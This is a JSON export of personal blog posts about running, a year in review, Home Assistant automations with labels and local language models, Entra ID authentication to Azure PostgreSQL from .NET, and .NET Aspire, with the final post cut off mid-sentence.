[ { "title": "1503km", "url": "https://www.aaron-powell.com/posts/2025-01-13-1503km/", "date": "Mon, 13 Jan 2025 02:21:15 +0000", "tags": [ "running" ], "description": "The story of my 2024 running journey.", "content": "With 2024 coming to a close I managed to just scrape through with my yearly goal of 1500km, having to go out on NYE for one last run (I had 7km to go, so I ran 10km just to be safe).\nCompared to 2023 where I managed to hit my 1500km goal in November, hitting it on the last day of the year was… different.\nThe raw stats Again, looking at my Strava profile, here’s the breakdown of what was 2024:\nTotal distance: 1503.3km Total time: 129 hours, 12 minutes (or 5 days, 9 hours, 12 minutes) Total activities: 208 Elevation gain: 10,163m My biggest month was November at 166km, followed by August at 162km. I’m not surprised by November being the biggest month, I went pretty hard there when I realised I might make it to 1500km, if I really stepped up the distance (nothing like a bit of pressure to get you moving).\nI also had a bunch of gym sessions and some paddle boarding in there, but Strava is pretty terrible at giving a full aggregation view (outside of their “year in sport” which you can’t retrieve after the year ends), so that’s just the pure running stats.\nLooking at the data vs the past few years, it’s a pretty similar amount of time spent running, 2023 was 133 hours and 2022 was 129 hours so it seems that year on year I spend about the same amount of time running, I just use that time differently.\nGoals So what changed from 2023 to 2024? Well, I’d say that it was ultimately my goal around what I wanted out of running. For the past few years I’d been pushing harder and harder to get faster and faster, but in 2024 I decided I wanted to focus on the basics and just get out there and run.\nMy wife also signed up for her first marathon (she also said it would be her only one, but she’s signed up again this year!), so I wanted to support her training, leaving the bulk of available running time to her.\nWe also spent a month overseas on holidays, which naturally resulted in a drop in running time. I did manage to get another Parkrun tourist in, running Highbury Fields in London and clocking a 19.30 (first sub-20 outside of Australia). I also went for a run around Tuscany which was some amazing scenery (and one particularly brutal hill). I capped off the trip running around Rome and getting selfies at all the major landmarks.\nTraining and races I did do two races this year, City2Surf and the 10km at the Sydney Marathon (while my wife ran the full). Since I wasn’t really that focused on races though, I didn’t really do any specific training for most of the year - sure as the events got closer I was a bit more structured, following the approach I’d used over the past few years (you can read them in last years post, I won’t rehash here).\nOne thing I decided to do this year for the first time was to gauge my fitness each quarter with a 3km time trial. For this, I picked a dead flat 3k loop around a nearby oval (although I had to move for Q3 and Q4 as the park/path was flooded), went out in the same shoes each time for consistency, and ran it as hard as I could. 
Here’s the time using the Elapsed Time from Strava:\nQ1*: 11:26 Q2: 10:50 Q3: 10:30 Q4: 10:19 Q1 is a bit of an outlier as the moving time is like 10:08, but that’s because I went out waaaaaaaaay too hard and had to pause about half way to ensure the water I’d had stayed down, so while on paper the splits look strong, it’s not an accurate reflection of the outcome.\nI’m pretty happy with the progression over the course of the year, and I think it’s an accurate reflection of how the year panned out. I’m not surprised that the last one was the fastest as it was on the back of the two races I did, so the training level was at its peak. I plan to continue this into 2025, and I’ll be interested to see what the Q1 time is this time, given the increased load I saw through the end of 2024, even though it wasn’t focused on speed work.\nCity2Surf was a pretty standard affair for me this year with a 58:29, about a minute behind my PB from 2023. I was expecting this, the event was the busiest I’d run in and given the rather average training I’d put in, being able to pull out a solid sub-60 was a good result.\nSydney Marathon 10km Yeah, pretty solid effort there! My goal was to run a sub-40, as I’d never run sub-40 in a 10k event before (I also hadn’t run a 10k event in a very long time, but that’s beside the point!), I’m more happy that I was in the top 100 finishers, which I think is a pretty solid achievement.\nBecause I had a goal I went into the race with a plan - run fast 🤣. Jokes aside, that was really pretty much the game plan. If you look at the Strava activity, it’s clear that it’s a net-downhill course, with a lot of front-loaded downhill, in it was over 50m down in the first 5k, meaning that you can push harder for the same effort. On the day, this got coupled with a hectic amount of wind, which was a bit of a tailwind coming down from North Sydney and over the bridge.\nI started a bit back in the pack, and managed to catch the 40 minute bus at the 5k mark, as we were headed into the flat area. This gave me a good indicator on where I was tracing and what I’d need to push for the back half of the course. I was able to push really hard through the 7th km, which was helped by a massive tailwind (actually copped a blast at one point that nearly caused me to trip, I did clip my foot on my other leg in a stride) but I knew I’d need this as the 8/9 km point was a rough climb, which got made even harder with the wind whipping down the street at us. I heard the pacers behind me, and I knew I had to push hard to keep in front of them (and I was thankful I’d banked some time), and then I could push again on the final bit of downhill to the finish.\nAfter the race was done I picked up my gear bag and went to find my wife on course, where I ran with her for a bunch. I ended up doing an extra 15k post my race… so maybe I could have pushed harder 😁.\nWrapping up So that’s 2024 in running for me. I’m pretty happy with how the year went, I didn’t have any injuries or major setbacks, I hit my goal, and I got back to the basics of “just running”. 
I’m not sure what 2025 is going to look like yet, I’m eying an event in April and I’ll do City2Surf again, mostly because I enjoy it, but I’m not sure what else I’ll do (probably the 10k at the Sydney Marathon again, assuming it comes back).\nI’m also going to keep up the quarterly time trials, I think they’re a good way to gauge fitness and see how I’m progressing, and I’m going to keep up the focus on just getting out there and running.\n", "id": "2025-01-13-1503km" }, { "title": "2024 a Year in Review", "url": "https://www.aaron-powell.com/posts/2025-01-09-2024-a-year-in-review/", "date": "Thu, 09 Jan 2025 05:25:21 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Would you look at that, I’m even early this year compared to my 2023 post which was earlier than 2022! I’m on a roll!\nIt’s funny sitting down to write this post because, honestly, I haven’t really done much writing in the past year. In fact, if we exclude the “in review” posts I did, one about 2023 and the other about running (so… nothing to do with tech), I wrote a grand total of 5 blog posts in 2024 (and two of them were about my smart home), which is the first time ever I’ve done only a single digit number of posts in a year.\nNow these numbers aren’t entirely accurate of my blogging, I published 4 blogs on the .NET blog so technically I wrote 9 posts, but I don’t really count those as they’re not on my personal blog.\nI’m not entirely sure as to why that is though. After all, it’s not like I didn’t do any work in 2024, I guess I just didn’t feel like I had much to say, at least not in this medium or I’m just lazy 😜.\nWork For the first half of 2024 I was still heavily involved in the .NET and AI story, but when Microsoft Build came around in May I handed over the AI aspect and took lead of the .NET Aspire strategy in our team. This is a much better fit for me, after all, the first two blogs I did last year were on Aspire and we’ve got other members in our team with an AI background that can take the lead on that.\nAspire has been great to work on, and it’s been very interesting getting more involved with a product team and seeing how they work. I’ve contributed a few bits of code to the project, done some docs work (one such bit was expanding how to write tests with Aspire which is honestly one of the best features), but the work I’m most proud of, and excited for the future of, is the .NET Aspire Community Toolkit.\nI pitched the idea of the Community Toolkit (or “Aspire Contrib” as it was originally pitched) back in June and we finally announced it in November. It really has exploded since then and I’m super excited for the community that we’re building around Aspire. From something that started with only like 2 integrations, we’re almost at 20 with 5 more in PR review (and a bunch more proposed). If you’re building with Aspire, check out what we’ve got to help you build a wider variety of apps. Check out this session from .NET Conf for more on the toolkit and how to build a custom integration.\nSpeaking I actually got back into speaking at events even more in 2024, I spoke at nearly 10 in person events (including getting to go to Japan to speak!), and a few online ones as well. 
And 2025 is shaping up to be just as busy, with 2 events already confirmed for the first half of the year.\nProbably the highlight I had was AI Tour Sydney in December, where I got to present about GitHub Copilot and Visual Studio in a 7000 seat arena (look, there might have only been a few hundred in there, but the arena can hold 7000 😜). It’s an arena that Elton John has performed on, so I’ve technically performed on the same stage as him #humblebrag.\nIf you squint you can see me on stage 😜.\nMy other speaking highlight was being back at DDD Melbourne (I’m 11 for 12 of their events!) and I got to present about a personal topic, my journey through burnout. It was a very personal talk, and I was very nervous about it, but the response I got was very heartwarming and I’m very grateful for the support I received. I also got to reprise it for DDD Brisbane, and I’m glad I can do my part to remove the stigma around mental health.\nAnd with that, let’s bring on 2025.\n", "id": "2025-01-09-2024-a-year-in-review" }, { "title": "Building a Smart Home - Part 16 Seasonal Automation's", "url": "https://www.aaron-powell.com/posts/2024-09-01-building-a-smart-home---part-16-seasonal-automations/", "date": "Sun, 01 Sep 2024 04:03:16 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Spring has sprung here in Australia and it's time for the house to adapt", "content": "In the 2024.4 release of Home Assistant, the Labels feature was introduced. This feature allows you to add labels to entities, areas, and automations. This is a great feature for organisation as you can apply as many as you want and then perform actions based on those labels.\nPreviously, I’d tackled this style of organisation (and the organisation that Categories introduced) by putting keywords into the names of my automations, and while this worked, it wasn’t as clean as I would have liked.\nOne of the things I setup with this is adding season labels, Spring, Summer, Autumn, and Winter, and putting them on automations that are only relevant for that season. While this helps with the visual organisation, there’s also the benefit of automating automations based on the season. For example, we have motorised blinds in our house, and in summer, if the temperature of the room exceeds the desired threshold, we’ll automatically close them, but in winter, we’ll leave them open as a) it’s unlikely they’ll exceed the threshold and b) we want the sun to help heat the room.\nAutomating Based on Season Firstly, we need to know what season it is, and we can do that using the Seasons integration. This integration will create a sensor that will tell you what season it is based on the date. 
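If you want to sanity check what that sensor reports before building anything on top of it, a quick template in the Developer Tools Template tab does the trick (a rough sketch, assuming the default setup; the state is one of four lowercase values):
{{ states('sensor.season') }} {# e.g. 'winter'; the possible values are spring, summer, autumn and winter #}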
With the integration setup, we can access sensor.season and trigger automations based on value change.\n1 2 3 4 5 6 7 8 alias: Toggle seasonal automations description: "" trigger: - platform: state entity_id: - sensor.season condition: [] action: [] I’m going to use the choose action to determine what season it is and then trigger the relevant steps:\n1 2 3 4 5 6 7 action: - choose: - conditions: - condition: state entity_id: sensor.season state: winter sequence: [] In the sequence block, we’re going to run automation.turn_off and automation.turn_on actions to turn on and off the relevant automations.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 action: - choose: - conditions: - condition: state entity_id: sensor.season state: winter sequence: - metadata: {} data: stop_actions: true target: label_id: - summer - spring - autumn action: automation.turn_off - metadata: {} data: {} target: label_id: winter action: automation.turn_on Notice that we pass in the label_id of the labels we want to turn off and on. This is a list, so you can pass in as many as you want, and it means that we can have automations that are relevant for multiple seasons.\nRepeat this for all four seasons then with our automations labeled appropriately, we can have the house adapt to the season automatically.\nConclusion This is a crazy simply solution to something that I was previously doing manually, either by having a whole heap of conditions within automations to handle the concept of seasonality, or by manually turning on and off automations (which of course I’d forget to do). This is a great example of how a simple feature can have a big impact on the usability of Home Assistant.\nThe automation.turn_off and automation.turn_on actions with labels as the target is a powerful feature that I use for other use-cases, such as disabling certain automations overnight (mostly motion sensors) or toggling automations for when we have house sitters (which you can read more about in Part 11 of this series).\nIf you haven’t tried Labels yet, I highly recommend you do, as it’s a great way to organise your Home Assistant setup, and a nifty way to automate your automations.\n", "id": "2024-09-01-building-a-smart-home---part-16-seasonal-automations" }, { "title": "Building a Smart Home - Part 15 Generative AI and Notifications", "url": "https://www.aaron-powell.com/posts/2024-08-13-building-a-smart-home---part-15-genai-and-notifications/", "date": "Tue, 13 Aug 2024 06:01:47 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's have some fun with Generative AI", "content": "Like many people, I’ve been diving into Generative AI (GenAI) over the past 12 or so months and looking at how to use it in the sorts of solutions we can build. I’m also the kind of tinkerer that is looking for how to use technology in weird and wonderful ways. So, I’ve been looking at how to use GenAI in my smart home.\nBefore we get into that part of the story, a little bit of context around something I was doing recently. For the better part of a year I’ve had a daily notification that runs for our kids which tells them what they have on that day at school, whether it’s their library day, they have sport, after school care, etc. This runs at 8.30am, which is just before we leave the house and, well, it’s been a bit of a “Pavlov’s bell” for them. 
They hear the notification and they know what’s coming up that day and that it’s time to be ready to leave.\nThe thing is, this message is pretty static, I run a template that looks at a bunch of helpers setup in Home Assistant and then generates a message. It’s a bit boring because it’s very static, like “ here are your school reminders. It’s sports day, don’t forget your sports shoes. You have after school care today.” It’s the same generalised message, just plugging a few different variables in, so it solves the problem but it’s not very interesting.\nEnter GenAI After upgrading the hardware my Home Assistant instance runs on (from a Pi4 to a NUC), I have a bit more power to play with, so I had been running some Small Language Models (SLMs) on the NUC to see what I could do with them. The NUC itself is too underpowered to be used as a local GenAI server to back the Assistants part of Home Assistant (I tried, Phi3-mini doesn’t have a large enough token cap for the system message, let alone a user message, and anything larger takes so long to response that it’s completely impractical 🤣), but if it’s running a SLM that is only serving responses on occasions, well that should be fine.\nHello Ollama The first thing we need to do is have a way in which we can run the SLM and get a response. I’m going to be using Ollama, as it’s a nifty little tool for working with models like this, and it can be run either as a standalone executable, or as a Docker container. Follow their guide on how to get it running on whatever host you have (I’m using Docker on my NUC).\nNext, we’ll need to pick a model to use. Because I’m running this on a NUC, I don’t really have a GPU to play with, so I’ve decided to go with a pretty small model, Phi3 using the mini variant of it, which is only about 2gb of disk size and has 3.82B parameters. It’s not really that big, but given we’re going to be CPU-bound for this, we’ll have to make some tradeoffs (let’s just say, I won’t be running llama3.1:405b anytime soon 😅).\nWith everything setup, I can hit ollama with a request:\n1 curl -X POST -H "Content-Type: application/json" -d '{"prompt": "What should I tell the kids today?", "model": "phi3", "stream": false}' http://ollama.local:11434/api/generate Note: We set stream: false in the JSON payload to ensure we get the whole completion as a single response rather than a stream of responses. This is important because a streamed response isn’t really useful in this context.\nAnd get back a response (this one took just over a minute to generate):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 { "model": "phi3", "created_at": "2024-08-13T06:45:23.253914122Z", "response": " As an AI, I can help you come up with a variety of ideas for what to share with children. Here are some suggestions based on different themes:\\n\\n\\n1. **Science**: Share interesting facts about space exploration or explain how plants grow using simple experiments they can try at home.\\n\\n2. **History/Social Studies**: Discuss the importance of a historical figure like Martin Luther King Jr., and explore his contributions to civil rights in an age-appropriate manner.\\n\\n3. **Literature**: Read a story or fable from Aesop, highlighting moral lessons within them. Encourage children to share their interpretations afterward.\\n\\n4. **Arts/Crafts**: Have the kids engage in an art project using recycled materials to teach creativity and environmental responsibility.\\n\\n5. 
**Daily Life Lesson**: Explain a simple concept like sharing or being kind, perhaps through interactive role-playing activities.\\n\\n6. **Physical Activity/Health**: Teach the kids about staying active and healthy with fun exercises they can do together or games that encourage movement.\\n\\n\\nRemember to adjust the complexity of your message based on the age group you're addressing, ensuring it's engaging and understandable for them.", "done": true, "done_reason": "stop", "context": [ 32010, 1724, 881, 306, 2649, 278, 413, 4841, 9826, 29973, 32007, 32001, 1094, 385, 319, 29902, 29892, 306, 508, 1371, 366, 2041, 701, 411, 263, 12875, 310, 7014, 363, 825, 304, 6232, 411, 4344, 29889, 2266, 526, 777, 10529, 2729, 373, 1422, 963, 267, 29901, 13, 13, 13, 29896, 29889, 3579, 29903, 15277, 1068, 29901, 26849, 8031, 17099, 1048, 2913, 3902, 12418, 470, 5649, 920, 18577, 6548, 773, 2560, 15729, 896, 508, 1018, 472, 3271, 29889, 13, 13, 29906, 29889, 3579, 20570, 29914, 6295, 1455, 16972, 1068, 29901, 8565, 1558, 278, 13500, 310, 263, 15839, 4377, 763, 6502, 24760, 4088, 13843, 1696, 322, 26987, 670, 20706, 304, 7631, 10462, 297, 385, 5046, 29899, 932, 6649, 403, 8214, 29889, 13, 13, 29941, 29889, 3579, 24938, 1535, 1068, 29901, 7523, 263, 5828, 470, 285, 519, 515, 319, 267, 459, 29892, 12141, 292, 14731, 3109, 787, 2629, 963, 29889, 11346, 283, 6617, 4344, 304, 6232, 1009, 6613, 800, 1156, 1328, 29889, 13, 13, 29946, 29889, 3579, 1433, 1372, 29914, 29907, 4154, 29879, 1068, 29901, 6975, 278, 413, 4841, 3033, 482, 297, 385, 1616, 2060, 773, 1162, 11078, 839, 17279, 304, 6860, 907, 28157, 322, 29380, 23134, 29889, 13, 13, 29945, 29889, 3579, 29928, 8683, 4634, 27898, 265, 1068, 29901, 12027, 7420, 263, 2560, 6964, 763, 19383, 470, 1641, 2924, 29892, 6060, 1549, 28923, 6297, 29899, 1456, 292, 14188, 29889, 13, 13, 29953, 29889, 3579, 25847, 936, 13414, 29914, 3868, 4298, 1068, 29901, 1920, 496, 278, 413, 4841, 1048, 7952, 292, 6136, 322, 9045, 29891, 411, 2090, 24472, 3476, 267, 896, 508, 437, 4208, 470, 8090, 393, 13731, 6617, 10298, 29889, 13, 13, 13, 7301, 1096, 304, 10365, 278, 13644, 310, 596, 2643, 2729, 373, 278, 5046, 2318, 366, 29915, 276, 3211, 292, 29892, 5662, 3864, 372, 29915, 29879, 3033, 6751, 322, 2274, 519, 363, 963, 29889, 32007 ], "total_duration": 76865873877, "load_duration": 1001112, "prompt_eval_duration": 266416000, "eval_count": 292, "eval_duration": 76556834000 } Great, now let’s plug this into Home Assistant.\nHome Assistant Integration Home Assistant has an Ollama integration, but it’s not quite what I want. This is if you want to plug Ollama (or any other GenAI service) into Home Assistant as an Assistant, so you can ask it questions and get responses. I want to use it as a notification, so I can generate a message and send it to the kids (or really, any broadcast notification), which means I’m going to be using a RESTful Command to call the Ollama API. Here’s the configuration for that:\n1 2 3 4 5 6 7 ollama_phi3_completion: method: POST url: http://ollama.local:11434/api/generate content_type: "application/json; charset=utf-8" payload: "{{ payload }}" verify_ssl: false timeout: 300 Reload the RESTful Command config and then there will be a new entity in Home Assistant, rest_command.ollama_phi3_completion, which we can call from anywhere that allows us to call an action. 
To test it out, navigate to the Developer Tools -> Actions page in Home Assistant, select rest_command.ollama_completion from the dropdown, and then enter the following into the Service Data field:\n1 2 3 4 5 6 7 8 action: rest_command.ollama_phi3_completion data: payload: | { "prompt": "What should I tell the kids today?", "model": "phi3", "stream": false } And we can see a result:\nAwesome, time to plug it into an automation.\nAutomation I already have an automation that runs to generate the message that we then broadcast on the speakers around the house using a TTS (text-to-speech) service. I’m going to modify this automation to call the Ollama RESTful Command before calling the TTS service. But there’s a catch, the Ollama API can take a while to respond, from testing it can take a few minutes with a “real” payload size, so to keep the 8.30am notification on time, I’m going to run the Ollama API call at 5.30am and “cache” the response up until it’s needed.\nUnfortunately, while Home Assistant has a input_text helper that we can use, it has a max length of 255 characters, which is not enough for the response we’re going to get back from Ollama, so instead, we’ll just have the automation wait around for 8.30am.\nHere’s the automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 - alias: Kids school announcements (AI) description: "" trigger: - platform: time at: 05:30:00 condition: - condition: state entity_id: binary_sensor.school_is_school_day state: "on" action: - metadata: {} data: payload: "<snip>" response_variable: kid1_completion action: rest_command.ollama_phi3_completion alias: Generate kid1's announcement - metadata: {} data: payload: "<snip>" response_variable: kid2_completion action: rest_command.ollama_phi3_completion alias: Generate kid2's announcement - wait_for_trigger: - platform: time at: 08:30:00 - if: - condition: template value_template: "{{ kid1_completion['status'] == 200 }}" then: action: tts.cloud_say data: cache: false entity_id: media_player.whole_house message: "{{ kid1_completion['content']['response'] }}" alias: Broadcast kid1 announcement - wait_for_trigger: - platform: state entity_id: - media_player.whole_house from: playing to: idle timeout: hours: 0 minutes: 2 seconds: 0 milliseconds: 0 - if: - condition: template value_template: "{{ kid2_completion['status'] == 200 }}" then: action: tts.cloud_say data: cache: false entity_id: media_player.whole_house message: "{{ kid2_completion['content']['response'] }}" alias: Broadcast kid2 Announcement mode: single I’ve removed the actual payload from the automation, but you can see that we’re calling the Ollama API at 5.30am, storing the response in a response variable, then using the wait_for_trigger action to wait until 8.30am before broadcasting the message. If the Ollama API call fails, we just skip that child’s announcement. We also wait for the TTS service to finish before moving onto the next child’s announcement.\nExample Run Today, one of my kids didn’t have any “special” activities at school, so the message that was sent to the SLM was:\nCreate a friendly response that will announced over our house speakers in the morning to inform a child of their activities that they have today. Keep it short, it should be announced in the space of about 1 minute. The child's name is '<child>', and the following is a description of what their day involves. 
## Description There are no special activities at school today. And the response back from Ollama was:\nGood morning <child>! It’s time to get ready for another exciting day ahead. School starts just like any other day with learning, playing, and making new memories. Remember, even without special activities, every day brings opportunities to discover something amazing. Have a fantastic day at school, buddy! Conclusion This was a fun little project to work on, and it’s a great example of how you can use GenAI in your smart home to make things a little more interesting.\nI’ve had this running for a few days now (it was running in the background to test generation for a bit before I did the TTS and deprecated the original one) and the first time it ran I heard a call from my kids of “Dad, the house said something different today!” which is either a good sign, or a sign that Pavlov’s bell has been replaced with a new one 🤣.\nThere are still a few tweaks I need to do in the context around the message, for example, it will sometimes return emojis which the TTS service then reads out (we had “sparkle smiley face” the other day), but that’s all part of the fun of working with GenAI.\nIt was also funny when we had school sport, as we use an acronym to refer to it, but the model doesn’t know that acronym, so it made something up for it with… less than helpful results!\nMy next plan is to plug this into the automations that announce when our various appliances have finished their cycles (see Part 3 of this series on how I did that), so that we can get something better than “The washing machine has finished” 🤣.\n", "id": "2024-08-13-building-a-smart-home---part-15-genai-and-notifications" }, { "title": "Azure PostgreSQL, Entra ID Authentication and .NET", "url": "https://www.aaron-powell.com/posts/2024-06-03-azure-postgresql-and-entra-id-dotnet/", "date": "Mon, 03 Jun 2024 00:08:47 +0000", "tags": [ "dotnet", "security", "azure" ], "description": "A look at how to connect to an Azure PostgreSQL Flexible Server using Entra ID rather than username/password using Npgsql", "content": "I’m currently working on a project in which we are using Entra ID rather than a traditional PostgreSQL username and password. This is a great way to secure your database and ensure that only the right people have access to it.\nNote: For the purpose of this article, I’m going to use Entra ID to refer to a user identity, as well as a managed identity such as a service principal, as the approach is the same in this context.\nThe above linked documentation covers how you would set up the Azure resource with Entra ID as the authentication mode, so I won’t go over that here (also, you can configure that when you initially create the database, or using a Bicep script); instead I want to look at how we use that in a .NET application, because when you’re connecting using Entra ID you don’t have a password to use, or at least not in the traditional sense.\nFor this, I’m going to use the Npgsql library, which is the most popular PostgreSQL driver for .NET. It’s a great library and has a lot of features, and integrates nicely with Entity Framework Core and .NET Aspire.\nWhat makes connecting different Before we look at the how of connecting, we need to understand why this is a little different to using a username/password approach. 
When working with a PostgreSQL database that uses a username/password, you would have a connection string that looks like this:\nServer=myServerAddress;Port=5432;Database=myDataBase;User Id=myUsername;Password=myPassword; But when connecting using Entra ID, it looks like this:\nServer=server-name.postgres.database.azure.com;Database=postgres;Port=5432;Username=<Entra ID>;Ssl Mode=Require; Notice how there is no Password field in the connection string. This is because when you connect using Entra ID, you don’t have a password to use. Instead, you need to use a token that is generated by Entra.\nGenerating a token When you connect to the database using Entra ID, you need to request an access token from Entra that you can use to authenticate. You can see this in action using the Azure CLI:\n1 az account get-access-token --resource-type oss-rdbms Which returns something like this:\n1 2 3 4 5 6 7 8 { "accessToken": "<nope!>", "expiresOn": "2024-05-31 17:52:59.000000", "expires_on": 1717141979, "subscription": "<nope!>", "tenant": "<nope!>", "tokenType": "Bearer" } If you extract the accessToken from the JSON you can then plug that into the connection string for PostgreSQL in the Password argument and you’re good to go.\nBut it’s not really practical to be running the Azure CLI every time you want to connect to the database, especially since this token is only short lived (you can see the expiry date in the JSON above). Instead, we’re going to want to do this in .NET, and for that we’ll use the Azure.Identity NuGet package.\nUsing Azure.Identity Azure.Identity is a library that provides a way to authenticate with Azure services using the Azure SDK, and it contains a class called DefaultAzureCredential that can be used to authenticate. This class is actually a roll-up of a number of different authentication sources, such as Managed Identity, as well as the Azure CLI, Visual Studio, and a bunch of other sources (check out the docs to see all the sources).\nTo use DefaultAzureCredential you need to install the Azure.Identity NuGet package:\n1 dotnet add package Azure.Identity Then you can use it in your code like this:\n1 2 3 4 5 6 using Azure.Identity; var credential = new DefaultAzureCredential(); var ctx = new TokenRequestContext(["https://ossrdbms-aad.database.windows.net/.default"]); var tokenResponse = await credential.GetTokenAsync(ctx); Console.WriteLine(tokenResponse.Token); The important part here is that we’re providing a specific scope to the TokenRequestContext of https://ossrdbms-aad.database.windows.net/.default, which grants access to the Azure PostgreSQL Flexible Server. It’s what is being done with the az account get-access-token call and the --resource-type oss-rdbms argument. With this in C# though, we’re able to get the token and then use that to connect to the database.\nHandling Token Expiry One thing to note is that the token that is returned by DefaultAzureCredential is short lived, and will expire after a certain amount of time (24 hours service principal, 4 hours for a user token). This is fine for, say, a console app that is only running for a short period of time, but this becomes a problem if you’re using the connection string in something that is long running, like a web app, since the NpgsqlDataSourceBuilder, the type that is used to build the connection string, should be a singleton.\nThankfully, the authors of Npgsql have given us an approach to handling token refreshes in the box using a Periodic Password Provider. 
With this feature, we can provide a callback function to be run that will retrieve the password when a connection is opened, and then cache that password for a certain amount of time. This means that we can use the DefaultAzureCredential to get the token, and then use that token to connect to the database.\n1 2 3 4 5 6 7 8 9 NpgsqlDataSourceBuilder dataSourceBuilder = new(builder.Configuration.GetConnectionString("Database")); dataSourceBuilder.UsePeriodicPasswordProvider(async (_, ct) => { DefaultAzureCredential credential = new(); TokenRequestContext ctx = new(["https://ossrdbms-aad.database.windows.net/.default"]); AccessToken tokenResponse = await credential.GetTokenAsync(ctx, ct); return tokenResponse.Token; }, TimeSpan.FromHours(4), TimeSpan.FromSeconds(10)); On the dataSourceBuilder we call the UsePeriodicPasswordProvider method, passing in a callback function that will get the token, and then two TimeSpan objects that represent the refresh period and the failure refresh period. The refresh period is how often the token will be refreshed, and the failure refresh period is how long to wait before trying to refresh the token again if the token retrieval fails.\nConnecting it all up Now that we know how we can retrieve a token to act as the password for our connections, let’s look at how to connect it all up for a local dev or Azure deployed app:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 WebApplicationBuilder builder = WebApplication.CreateBuilder(args); var connStr = builder.Configuration.GetConnectionString("db"); NpgsqlConnectionStringBuilder csb = new(connStr); if (!string.IsNullOrEmpty(csb.Password)) { builder.AddNpgsqlDataSource("db"); } else { builder.AddNpgsqlDataSource("db", dataSourceBuilder => { dataSourceBuilder.UsePeriodicPasswordProvider(async (_, ct) => { DefaultAzureCredential credential = new(); TokenRequestContext ctx = new(["https://ossrdbms-aad.database.windows.net/.default"]); AccessToken tokenResponse = await credential.GetTokenAsync(ctx, ct); return tokenResponse.Token; }, TimeSpan.FromHours(4), TimeSpan.FromSeconds(10)); }); } // and the rest of your app code Here we’re getting the connection string and creating a NpgsqlConnectionStringBuilder from it so that it gets parsed for us. If the connection string we have has a password, then we can just use that as normal, but if it doesn’t have a password, then we can use the UsePeriodicPasswordProvider method to get the token and use that as the password.\nThis means we can run locally against a database that uses username/password style access (since we don’t have Entra ID locally), and then deploy to Azure and use Entra ID without having to change the code.\nConclusion When porting an app that uses PostgreSQL to using Managed Identity I was expecting that it would be quite a lot of work to manage the token retrieval and expiry, initially I thought that it’d require doing a bunch of work to discard the singleton for the NpgsqlDataSourceBuilder and then recreate it when the token expired. 
But thanks to the UsePeriodicPasswordProvider method, it’s actually quite easy to manage the token retrieval and expiry, and it’s all handled for you.\n", "id": "2024-06-03-azure-postgresql-and-entra-id-dotnet" }, { "title": "Exploring OpenAI With Aspire Preview 3", "url": "https://www.aaron-powell.com/posts/2024-02-22-exploring-openai-with-aspire-preview-3/", "date": "Thu, 22 Feb 2024 02:04:24 +0000", "tags": [ "dotnet", "ai" ], "description": "With Aspire Preview 3 there is a new service connector for OpenAI, let's check it out.", "content": "I’ve been exploring .NET Aspire as a pattern for how to build .NET apps, and when checking the features of the Preview 3 release I noticed something interesting, a new service connector for using OpenAI/Azure OpenAI. We knew this was coming, I was following the PR for it, and given I’ve been doing a lot of AI stuff it made sense to try it out.\nBefore we can use the service connector we need to setup the resource in the AppHost:\n1 2 3 4 5 var builder = DistributedApplication.CreateBuilder(args); var openAI = builder.AddAzureOpenAI("AzureOpenAI"); builder.AddProject<MyApp>("app").WithResource(openAI); builder.Build().Run(); In this case we’re using the new AddAzureOpenAI resource builder method to create the resource definition, but if you don’t want to use Azure you can use AddOpenAI instead. Next, the resource needs to be named, in this case I went to AzureOpenAI. This name is important because it’s used to get the endpoint and key from config. Currently, this uses the ConnectionStrings feature of the .NET config system, so I’ve added a section to my appsettings.Development.json like this:\n1 2 3 "ConnectionStrings": { "AzureOpenAI": "Endpoint=https://<my-endpoint>.openai.azure.com/;Key=<my-api-key>" } Admittedly, this setup isn’t ideal as the concept of a connection string doesn’t really map to how the OpenAI SDK works, but that’s being discussed by the team. Also, if you’re using managed identity to connect you don’t need the Key component of it.\nIt’s also possible to define model deployments:\n1 openAI.AddDeployment("gpt-35-turbo"); So far, this doesn’t seem to be used but it’s laying the groundwork for the future where it’ll be possible to deploy Azure OpenAI resources, which is currently not possible.\nAnyway, we have the resource defined and added to our app, now we can use the service connector in the MyApp project:\n1 2 3 4 5 var builder = WebApplication.CreateBuilder(); builder.AddAzureOpenAI("AzureOpenAI"); // Finish configuring the app Like with all Aspire resources, for the service connector we provide the same name that the resource was built as, AzureOpenAI in this case, and with the AddAzureOpenAI inject an instance of the OpenAIClient (from the Azure.AI.OpenAI SDK, which is the same regardless of if you’re doing OpenAI or Azure OpenAI).\nAnd with that all setup, we can inject the OpenAIClient instance into anything we need to use it, such as in an API handler:\n1 2 3 api.MapGet("chat", (OpenAIClient client) => { // Do AI stuff }); Wrapping up While it might seem like it’s pretty trivial to setup the OpenAIClient to be injected in an application, I really like the direction that Aspire is taking with the service connectors. 
The fact that we can define the resource and inject it into the applications, allowing the resource to be shared across a set of services in your app makes it very convenient.\nI’m not a fan of the “connection string” model for providing the credentials, so I’m following along with what the discussion is going to land on.\nAlso, while deployment isn’t supported in Preview 3, I don’t doubt that that is coming along for a future release, so I’m keen to play with that when it lands.\nUntil then, let’s keep building!\n", "id": "2024-02-22-exploring-openai-with-aspire-preview-3" }, { "title": "Persisting Data Volumes With .NET Aspire", "url": "https://www.aaron-powell.com/posts/2024-01-23-persisting-data-volumes-with-dotnet-aspire/", "date": "Tue, 23 Jan 2024 02:31:26 +0000", "tags": [ "dotnet" ], "description": "Tired of losing all the data when you restart your .NET Aspire app? Let's fix that!", "content": "This post is written against the .NET Aspire Preview 2 release, so it may change when the final version is released.\nRecently, I’ve been building an app using .NET Aspire which I’m using PostgreSQL as the database and Azure Storage Blobs and Queues in.\n.NET Aspire is awesome for this, as you can setup a developer inner loop super simply with the components that ship, and the nice thing about this is that locally PostgreSQL is run in a Docker container and Azure Storage uses the Azurite storage emulator (which also happens to run in a container).\nThe problem with this is that when you restart your app, you lose all the data in the database and storage emulator, since they are started fresh each time.\nTurns out, it’s a 